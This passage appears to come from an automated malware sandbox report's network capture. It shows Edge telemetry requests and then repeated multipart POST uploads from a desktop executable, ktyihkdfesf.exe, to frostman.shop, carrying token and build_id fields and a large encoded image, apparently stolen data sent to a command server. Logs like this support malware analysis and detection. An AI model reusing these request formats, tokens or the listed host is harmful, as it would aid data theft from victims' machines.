                                                                                                                                                                                                                                                                                                2024-12-20 06:31:56 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676314091&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 5369
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:56 UTC5369OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 36 3a 33 31 3a 35 34 2e 30 39 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 36 66 31 64 37 32 35 2d 30 65 36 31 2d 34 38 63 32 2d 38 31 63 62 2d 38 30 31 34 33 61 31 36 32 30 61 35 22 2c 22 65 70 6f 63 68 22 3a 22 39 30 32 32 38 38 36 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-20T06:31:54.090Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"56f1d725-0e61-48c2-81cb-80143a1620a5","epoch":"902288666"},"app":{"locale"
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:56 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=803469995fb14dcbbac1bd20543a5729&HASH=8034&LV=202412&V=4&LU=1734676316603; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:56 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=0c7a1b1a9f0742e8b5ba8d0722f89df8; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:56 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 2512
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:56 GMT
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                61192.168.2.64999052.178.17.24432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:56 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676314250&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 9806
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:56 UTC9806OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 36 3a 33 31 3a 35 34 2e 32 35 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 36 66 31 64 37 32 35 2d 30 65 36 31 2d 34 38 63 32 2d 38 31 63 62 2d 38 30 31 34 33 61 31 36 32 30 61 35 22 2c 22 65 70 6f 63 68 22 3a 22 39 30 32 32 38 38 36 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-20T06:31:54.250Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"56f1d725-0e61-48c2-81cb-80143a1620a5","epoch":"902288666"},"app":{"loca
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:57 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=567f2f10eb254f29b32a2d99c3b69f25&HASH=567f&LV=202412&V=4&LU=1734676316754; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:56 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=2f5e6258ec8943169370a4ddb5b872b5; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:56 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 2504
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:56 GMT
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                62192.168.2.649995116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:58 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----R1V3EC2VAAAAAIEUSJ58
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 98177
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:58 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 52 31 56 33 45 43 32 56 41 41 41 41 41 49 45 55 53 4a 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 52 31 56 33 45 43 32 56 41 41 41 41 41 49 45 55 53 4a 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 52 31 56 33 45 43 32 56 41 41 41 41 41 49 45 55 53 4a 35 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------R1V3EC2VAAAAAIEUSJ58Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------R1V3EC2VAAAAAIEUSJ58Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------R1V3EC2VAAAAAIEUSJ58Cont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:58 UTC16355OUTData Raw: 55 55 55 55 41 46 46 46 46 41 42 53 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 42 6f 6f 4e 41 43 55 55 55 55 41 46 46 46 46 41 43 55 55 74 4a 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 53 47 6c 70 44 51 41 55 55 55 55 41 46 4a 53 30 6c 41 42 51 61 4b 4b 41 45 6f 70 61 53 67 41 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 57 6b 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 70 4b 41 43 6b 70 61 53 67 41 6f 6f 6f 6f 41 31 36 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 53 76 4d 66 69 55 76 38 41 59 2f 69 7a 77 78 34 6d 58 68 49 70 78 62 7a 74 2f 73 35 7a 2f
                                                                                                                                                                                                                                                                                                Data Ascii: UUUUAFFFFABSUtFACUUUUAFJS0UAJRRRQAUlLRQAlFFFABRRRQAUUUUAFBooNACUUUUAFFFFACUUtJQAlFLRQAlFFFABRRRQAlFFFABRRRQAlFFFABRRRQAlFFFABSGlpDQAUUUUAFJS0lABQaKKAEopaSgAooooAKSlooASiiigBKKWkoAKKKKAEooooAKSlpKACkpaSgAooooA16KKKACiiigAooooASvMfiUv8AY/izwx4mXhIpxbzt/s5z/
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:58 UTC16355OUTData Raw: 58 74 35 66 52 74 48 6d 5a 34 57 4f 6c 7a 56 62 64 69 56 66 61 70 56 2b 74 51 67 31 49 44 58 71 4a 48 46 59 6e 55 38 31 4b 6f 79 61 69 58 72 55 79 34 37 35 6f 73 5a 76 79 46 78 6e 33 71 49 75 38 54 5a 51 6b 56 30 57 6c 65 48 70 62 77 43 57 34 4a 53 49 39 42 33 4e 64 52 44 34 61 30 6c 49 67 72 57 6f 6b 39 53 35 35 72 68 72 59 36 6c 42 38 75 35 32 55 73 42 55 71 4b 37 30 4f 4a 73 72 78 5a 78 74 59 34 63 56 63 48 31 72 62 31 48 77 66 61 4d 50 4f 73 43 59 5a 6c 35 41 37 47 73 44 4d 6b 55 6a 52 54 4c 74 6b 55 34 59 56 35 39 53 74 43 57 73 54 48 45 59 57 56 46 33 65 78 4d 4b 73 78 4e 7a 56 51 4e 79 4b 6d 6a 50 4e 65 64 56 6c 71 63 36 4e 69 32 63 35 46 62 31 72 4a 6c 4b 35 6d 32 62 70 57 37 5a 53 56 77 54 33 4c 6a 6f 58 37 75 50 7a 37 4f 52 44 32 55 6b 66 57 75
                                                                                                                                                                                                                                                                                                Data Ascii: Xt5fRtHmZ4WOlzVbdiVfapV+tQg1IDXqJHFYnU81KoyaiXrUy475osZvyFxn3qIu8TZQkV0WleHpbwCW4JSI9B3NdRD4a0lIgrWok9S55rhrY6lB8u52UsBUqK70OJsrxZxtY4cVcH1rb1HwfaMPOsCYZl5A7GsDMkUjRTLtkU4YV59StCWsTHEYWVF3exMKsxNzVQNyKmjPNedVlqc6Ni2c5Fb1rJlK5m2bpW7ZSVwT3LjoX7uPz7ORD2UkfWu
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:58 UTC16355OUTData Raw: 4c 77 73 59 6a 79 55 75 4a 6c 7a 39 4a 47 72 71 5a 66 38 41 56 50 37 71 66 35 56 7a 50 77 2f 50 2f 45 69 6e 2f 77 43 76 79 66 38 41 39 47 4e 51 42 31 66 57 69 6c 48 53 69 67 42 4b 4b 4b 4b 41 43 6b 6f 70 61 41 45 78 53 55 74 4c 51 41 32 6b 7a 54 73 55 6d 4b 41 4f 48 31 35 64 33 6a 37 54 51 41 54 2b 37 42 50 48 75 61 36 31 77 32 7a 39 32 71 37 6a 30 7a 58 4f 61 68 6b 66 45 4b 7a 32 70 76 50 32 5a 75 50 7a 72 6f 50 4e 75 63 38 32 35 78 37 4d 4b 74 45 4d 57 52 6c 69 69 33 4f 42 6e 67 48 61 4b 52 49 59 34 77 46 7a 79 54 6e 6b 30 65 5a 50 2f 77 41 2b 72 66 38 41 66 61 31 45 42 4f 58 4c 79 51 4d 78 42 79 76 7a 44 69 71 4a 4c 47 7a 50 51 44 30 36 30 30 49 33 6e 4e 6b 4c 73 2f 68 48 70 51 5a 4a 2b 76 32 5a 76 2b 2b 68 52 35 73 2f 48 2b 6a 4e 7a 2f 74 69 67 43 4e
                                                                                                                                                                                                                                                                                                Data Ascii: LwsYjyUuJlz9JGrqZf8AVP7qf5VzPw/P/Ein/wCvyf8A9GNQB1fWilHSigBKKKKACkopaAExSUtLQA2kzTsUmKAOH15d3j7TQAT+7BPHua61w2z92q7j0zXOahkfEKz2pvP2ZuPzroPNuc825x7MKtEMWRlii3OBngHaKRIY4wFzyTnk0eZP/wA+rf8Afa1EBOXLyQMxByvzDiqJLGzPQD0600I3nNkLs/hHpQZJ+v2Zv++hR5s/H+jNz/tigCN
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:58 UTC16355OUTData Raw: 70 78 64 6d 6d 4e 53 6c 73 39 6a 48 62 56 72 39 4a 4d 4e 5a 6c 6c 55 34 4f 31 54 79 66 38 4d 59 71 5a 74 59 6d 55 74 2f 6f 45 70 41 58 63 4d 44 72 57 76 67 65 67 78 52 67 65 67 34 36 56 73 68 47 44 4c 72 56 32 34 68 4d 46 6c 49 43 78 47 34 4d 4f 67 72 63 58 4a 55 45 39 78 54 73 44 47 4f 50 79 6f 41 34 70 67 4a 53 5a 70 39 4a 69 67 44 6b 37 67 2f 38 58 4c 73 76 2b 76 52 76 36 31 31 31 63 66 65 6e 62 38 53 62 48 2f 72 30 62 2b 74 64 50 35 68 39 61 41 4c 4f 52 54 66 78 71 44 7a 50 65 6b 33 6d 67 43 63 39 61 53 6f 64 35 6f 38 77 30 41 53 45 6d 6d 6d 6f 7a 49 61 54 64 51 41 2b 6b 4a 46 4d 4a 4e 4d 4c 55 41 50 4c 55 77 6d 6d 46 36 4e 31 41 44 73 30 30 6d 6d 6c 71 61 57 6f 41 63 54 54 53 61 61 54 52 6e 69 67 42 63 30 32 6b 7a 53 5a 6f 41 55 6d 6d 35 70 43 61 54
                                                                                                                                                                                                                                                                                                Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:58 UTC16355OUTData Raw: 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 2b 52 36 46 52 58 50 2b 43 34 5a 37 66 77 36 73 4d 38 54 52 62 4c 69 66 79 30 61 46 6f 51 45 38 78 69 75 45 59 6b 71 75 4d 59 47 54 67 59 72 6f 4b 47 49 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 66 52 53 55 55 41 46 46 46 46 41 42 53 64 71 57 6b 6f 41 57 6b 6f 6f 6f 41 4b 4b 53 69 67 42 61 53 69 69 67 41 6f 6f 6f 6f 41 4b 4b 53 69 67 42 61 4b
                                                                                                                                                                                                                                                                                                Data Ascii: Irhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv+R6FRXP+C4Z7fw6sM8TRbLify0aFoQE8xiuEYkquMYGTgYroKGIKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAfRSUUAFFFFABSdqWkoAWkoooAKKSigBaSiigAooooAKKSigBaK
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:58 UTC47OUTData Raw: 2f 58 78 4e 2f 36 44 48 51 42 2f 2f 39 6b 3d 0d 0a 2d 2d 2d 2d 2d 2d 52 31 56 33 45 43 32 56 41 41 41 41 41 49 45 55 53 4a 35 38 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: /XxN/6DHQB//9k=------R1V3EC2VAAAAAIEUSJ58--
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:59 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:59 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                63192.168.2.650003116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:01 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AIM7GLFCBIE3EUS00HLX
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:01 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 49 4d 37 47 4c 46 43 42 49 45 33 45 55 53 30 30 48 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 41 49 4d 37 47 4c 46 43 42 49 45 33 45 55 53 30 30 48 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 41 49 4d 37 47 4c 46 43 42 49 45 33 45 55 53 30 30 48 4c 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------AIM7GLFCBIE3EUS00HLXContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------AIM7GLFCBIE3EUS00HLXContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------AIM7GLFCBIE3EUS00HLXCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:32:02 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                64192.168.2.650010116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:03 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----7QQ1N79ZC2V37Q9ZCBIW
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:03 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 37 51 51 31 4e 37 39 5a 43 32 56 33 37 51 39 5a 43 42 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 31 4e 37 39 5a 43 32 56 33 37 51 39 5a 43 42 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 31 4e 37 39 5a 43 32 56 33 37 51 39 5a 43 42 49 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------7QQ1N79ZC2V37Q9ZCBIWContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------7QQ1N79ZC2V37Q9ZCBIWContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------7QQ1N79ZC2V37Q9ZCBIWCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:32:04 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                65192.168.2.65002220.198.119.143443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
